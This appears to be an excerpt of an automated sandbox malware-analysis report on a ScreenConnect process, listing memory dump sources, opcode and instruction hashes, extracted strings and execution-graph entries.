                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E086314087498FC701EF68D459465BFF4EF95200B05868BE5895B123FB70D585D741
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 63d2bdbd0d9cd1a586bfc3a42f4867219177270d2be89b78bac2a9bb35154bf2
                                                                                                                                                                                                                                                    • Instruction ID: 28f730f028c5a6331b966716aaaccd58b57c9073b4605a0618eab8c74acfa278
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63d2bdbd0d9cd1a586bfc3a42f4867219177270d2be89b78bac2a9bb35154bf2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AD01230D41148EF8B08EFA4E90055DB7FDEB49205B1055A9D809D3214DA316E049B80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ec41a23ce0cbad856d2961933688f6590acc50f310d09cd8e8ac97a8f2554547
                                                                                                                                                                                                                                                    • Instruction ID: d5fc5681ab6aeb293e6fb924701fa591d4b1cb9b002ff8b2ea170c1e9c0e6315
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec41a23ce0cbad856d2961933688f6590acc50f310d09cd8e8ac97a8f2554547
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D0A733300014AFAB089B5CD410C567BD9DF985203004066F908D7331CB71EC1097E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 27050b8ef231e9396bd5d1225619073b35999da386b10fd3f0d562816f16c337
                                                                                                                                                                                                                                                    • Instruction ID: 8330350aa878a0c9ab65dd261154426749f54094b043e4e1786fc005a7aa60de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27050b8ef231e9396bd5d1225619073b35999da386b10fd3f0d562816f16c337
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43D012357106245F9744AA5DE404C9A77DEDF4D660310407AF605CB330DEB1AD1097D4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6f4dbcecb20b37eb951089d93f71da77079779c549dab9dbf5f3e9466ddacc90
                                                                                                                                                                                                                                                    • Instruction ID: eec71576231dcd769f3cbbbd754d03d526c6f909ece09d56e954e2f43ea30eed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f4dbcecb20b37eb951089d93f71da77079779c549dab9dbf5f3e9466ddacc90
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1D0C7363001149F97089A5DD414C567BD9DF995607114066E509C7371DA71DC1197D5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 69116d112186de98f7888db52e78eb996838662015ebe31c26c236b72995063c
                                                                                                                                                                                                                                                    • Instruction ID: c4cc06208a4b9aa5982004f6ade88abc5fe0e892144ae3b7475fdbb797835147
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69116d112186de98f7888db52e78eb996838662015ebe31c26c236b72995063c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6C080617440100FC294D10CDCA0615EBE2DBE924572CC4B7A51DC77B5D971CC538345
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4f4039d04769ede1ba66e470d048f25482d74884a16133a5fff78a5ac3c2c596
                                                                                                                                                                                                                                                    • Instruction ID: 6203088b9df24af69f16b7bdfa0901a4c3992bec5cf05b4f6576f19a2cf3d925
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f4039d04769ede1ba66e470d048f25482d74884a16133a5fff78a5ac3c2c596
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD0C932814B0D8ACB00BFB8D4554A9FBB8EFD5240F00CA5EE88A67121FF70E6D0D681
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:14.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:5
                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                    execution_graph 11525 7ff848f18014 11527 7ff848f1801d 11525->11527 11526 7ff848f18082 11527->11526 11528 7ff848f180f6 SetProcessMitigationPolicy 11527->11528 11529 7ff848f18152 11528->11529

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (O"I$x!!I$X!I
                                                                                                                                                                                                                                                    • API String ID: 0-481848013

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: @`!I$@b!I
                                                                                                                                                                                                                                                    • API String ID: 0-3463773438

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: x!!I
                                                                                                                                                                                                                                                    • API String ID: 0-903845743
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d25a0b1df98609af60d986cad8b533295182b1fe9bdc3762aa6b3458e301a8de
                                                                                                                                                                                                                                                    • Instruction ID: a9bd9277ff5c0246222413f58c014f9b30e3bb31786267a4c1a25d0637ee0ba1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d25a0b1df98609af60d986cad8b533295182b1fe9bdc3762aa6b3458e301a8de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DE1D333E0DEA78EF779BF6884556B96792EF94781F14407AC03EC71C2DE29AA058740

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: PH$XH$`H$X!I$Z!I${2
                                                                                                                                                                                                                                                    • API String ID: 0-1852867366
                                                                                                                                                                                                                                                    • Opcode ID: 4d084d04198e9ea2e2272a4772d6ee0a7ddf03d4a3fb5bf7c021c0720535b207
                                                                                                                                                                                                                                                    • Instruction ID: 9c7edbc04506bf90167d2922647ab57ec35b77fef45bd7bc22a057cf87bbb430
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d084d04198e9ea2e2272a4772d6ee0a7ddf03d4a3fb5bf7c021c0720535b207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82910871A0C99A4FEB98EF289851AB537E1FF64750F1405BDD06EC7287DE29F8068780

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3299529708.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 5aeba379722867c92646d88d95da6835f5ec7832318175c4ce25436a5b804fac
                                                                                                                                                                                                                                                    • Instruction ID: f25cf8dfcf14d8d09b741f9f312170a048f75e0169dcda7f12635c55ebdd2ae0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aeba379722867c92646d88d95da6835f5ec7832318175c4ce25436a5b804fac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75515831C1CB484FDB15AFA8984A5F9BBE0EF55750F04017EE489C3192DF68A846CB95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 870 7ff848f13aa2-7ff848f180ef 872 7ff848f180f6-7ff848f18150 SetProcessMitigationPolicy 870->872 873 7ff848f18158-7ff848f18187 872->873 874 7ff848f18152 872->874 874->873
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3299529708.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 8d12d78ff30a10a4ae70b9015ec686206be755e5318f8b2bfec91809a2d54926
                                                                                                                                                                                                                                                    • Instruction ID: 4f5062ce2a2722717206b3177d7c54607bd648c9b0ebfa7aca18ea9323aef446
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d12d78ff30a10a4ae70b9015ec686206be755e5318f8b2bfec91809a2d54926
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5121D73191CB188FDB18AF9CD84A6FAB7E0EB55711F00413EE04AD3651DB74B8458B95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (O"I
                                                                                                                                                                                                                                                    • API String ID: 0-2545298724
                                                                                                                                                                                                                                                    • Opcode ID: 0a160fb43ba8c347614bcb8da3a555181ecc0073fb8d29cd277dbb9464657f57
                                                                                                                                                                                                                                                    • Instruction ID: f9eda17d878dc7ad20c1735640f91c2de6c3c93500e05b5f06dea00d805303e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a160fb43ba8c347614bcb8da3a555181ecc0073fb8d29cd277dbb9464657f57
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73A1F631E1D9965FF7A8BE2880516B533E1FFA4780F14457EC42EC32C7DE28A9458780

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: x!!I
                                                                                                                                                                                                                                                    • API String ID: 0-903845743
                                                                                                                                                                                                                                                    • Opcode ID: 0f437839b47f8ba1fc3b22e7d3d7d7aa3bc47c83a2fd7ba448caa69b1c787f3d
                                                                                                                                                                                                                                                    • Instruction ID: 25e85f5cdcf3c052216f446f0240900ff2bc5e26b2597890dc1ab08b17ff1187
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f437839b47f8ba1fc3b22e7d3d7d7aa3bc47c83a2fd7ba448caa69b1c787f3d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D791782191E5D74FF795BB7864515F93BA0EF41798F0842BAD0ACCB0C7EE1CA8068356
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f20553a96c55dccd14f858a5682f34ad0c3145b763eef150b1b4b541896a9921
                                                                                                                                                                                                                                                    • Instruction ID: eb6d4d8c128e0d1cc2bc2d7e8df89aa9ce71163611c4cd9887bf8ca6229cbf01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f20553a96c55dccd14f858a5682f34ad0c3145b763eef150b1b4b541896a9921
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2611A272D0CADA8FEBA5EF6498664B87FE0FF56304F1550AAD068C3292DA74A900C701
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4b10468927861fc58818b8b33aeac5fe3644847d07b8844cbbda3ee012c8733b
                                                                                                                                                                                                                                                    • Instruction ID: 31e66e41355bfe08363084c4029d6604735b7f14ac828c17954279335400f239
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b10468927861fc58818b8b33aeac5fe3644847d07b8844cbbda3ee012c8733b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49119070A0C95A8FEB99EF288050B6577E1FF54344F1444B8C42ECB287CE29E84AC780
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f006a779c03ab86e3fe56147b40c9c03cd826adadc8230eaf8b2eb18c5f4234a
                                                                                                                                                                                                                                                    • Instruction ID: 99ada042f8e4e39dfd7372d899e5245b78842b2016c24a73c3c2a0025b07c379
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f006a779c03ab86e3fe56147b40c9c03cd826adadc8230eaf8b2eb18c5f4234a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C11E02490DAE70EF779A72954602746AE1EF81280F1981BAC469C61D2DD2C9C89C301
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 620de0ddacca7d8ff308c2cbb5e82a5ef50c3685b25b362b18aa45d6cb839f5c
                                                                                                                                                                                                                                                    • Instruction ID: 72b9d94dd7b52eeee86197c62cb5936fe2edfcaf69ff75c6166ac46e74c07a23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 620de0ddacca7d8ff308c2cbb5e82a5ef50c3685b25b362b18aa45d6cb839f5c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83119470A1C94A4FEB99EF28C451B6577E1FF54744F0444B8C46DCB287DE29E849C780
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c5fa20c7930078b5cd9bfca259f8a4dbd3074e51c3feab492086f01c4575227c
                                                                                                                                                                                                                                                    • Instruction ID: 70479a36e0a3bf44fce19f37c07788231fbc1a47eb582bdb5212a0b884b1ff50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5fa20c7930078b5cd9bfca259f8a4dbd3074e51c3feab492086f01c4575227c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0303540D6DC5FCB52EB64D4558D67FB0EF16311B0501C7E059CB052D7619A59CB82
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f9a34cbd2f8670be270df6b3b01e87cf37e2671066ba109eea8679aab049ede3
                                                                                                                                                                                                                                                    • Instruction ID: d47bccf9291c717e68e18e9a570fc2c7f18902dbba00e32e1c1cb01fe4f54e5e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9a34cbd2f8670be270df6b3b01e87cf37e2671066ba109eea8679aab049ede3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE06D6110E3D40FD7569B3484A88E57F609D1321431940EBD4858F0A3E5158989C752
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f95d4284f50e2f9fb7c11800f3cf52e4d157def6f120d6c4a0d2049857c5d4f1
                                                                                                                                                                                                                                                    • Instruction ID: 2dede87515e823203469f4a51e25ae53619c9064d4a353977c06c0b262aaab56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f95d4284f50e2f9fb7c11800f3cf52e4d157def6f120d6c4a0d2049857c5d4f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E0C225D4DA270AFB7C3A3574913B560D08F44391F0940BA983DC00D5DE6C9CC5C551
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7c3a9d049ff25b08266e7921892b498fedb2ab1cf8801e6fd39512a5118f2919
                                                                                                                                                                                                                                                    • Instruction ID: fab3af01954616d8672ae314d8a4bb1b3513fe47a8bd5e153af8ecaedb7c1b27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c3a9d049ff25b08266e7921892b498fedb2ab1cf8801e6fd39512a5118f2919
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FD09E12F6CCAA0EA5E4F57C24562B902C6E7A8AD0B9410B6D56CC728ADD0D5D8603C1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd